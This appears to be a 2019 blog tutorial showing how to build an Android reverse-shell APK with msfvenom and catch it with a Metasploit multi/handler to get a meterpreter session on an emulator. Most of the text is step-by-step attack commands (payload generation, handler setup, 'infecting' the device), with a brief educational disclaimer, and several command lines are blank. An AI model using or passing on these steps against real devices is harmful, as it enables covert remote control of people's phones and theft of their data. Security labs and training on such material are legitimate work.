Hacking Android With Metasploit

Good morning/evening/night my fellow hackers, today’s lesson is on Metasploit and how we can hack Android with a Metasploit payload. So let’s get started!!

As always, this post is for educational purposes and should not be used on your friends or enemies, that’s illegal.

Firstly we are using an Android emulator for this class. You can download the APK yourself from here and try this cool hack.

Once you have that set up, we then need an attacking machine with Metasploit built in, Kali Linux is our go-to attacking machine.

Next we will generate our android payload and make it into an APK so that it is executable, so open up a shell and on the command line type

msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > androidhack.apk

In the command above we are asking the tool msfvenom to use the payload of reverse TCP, use our attacking IP as the LHOST and 4444 as the LPORT we will use to listen on.

Your IP may differ from ours, you can check with the ifconfig command.

Before we do anything with our new file, we will need to give it permissions to be able to execute, type

chmod 755 androidhack.apk

Once you enter that command the color of the file should turn green.

That’s the payload generated as an APK file that can be installed by any Android device. Next we will need to infect the device.

So let’s install the APK on the Android emulator.

To do that we just need to visit our attacking machine IP, so open a browser on the device and go to


Let’s click on the file and install it on the device, once the app is installed you will be informed, but don’t open it just yet.


Now we need to generate an exploit on our attacking machine, we will do this with Metasploit. So open up a new tab or shell and type msfconsole.


Once the Metasploit console is open we can now generate the exploit. On the command line type

use exploit/multi/handler



Next we need to set the payload for a reverse TCP connection with the app on the Android device. Type

set PAYLOAD android/meterpreter/reverse_TCP

Perfect, now we set up our attacking machines IP as the LHOST again, sotype


A show options command will tell us that everything is set up correctly.


All that’s left to do nonw is exploit! type


Now let’s open the APK file on the Android device, when we click on the Open button we should get a reverse TCP shell from the Android device to our meterpreter shell.


Beauty, it worked!! Just to confirm we can type the command sysinfo.


And as we can see we have managed to hack the device.

Thanks so much for reading to the end, please feel free to like, share or comment.

And don’t forget to subscribe to get more free tutorials like this one.

QuBits 2019-09-04


Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.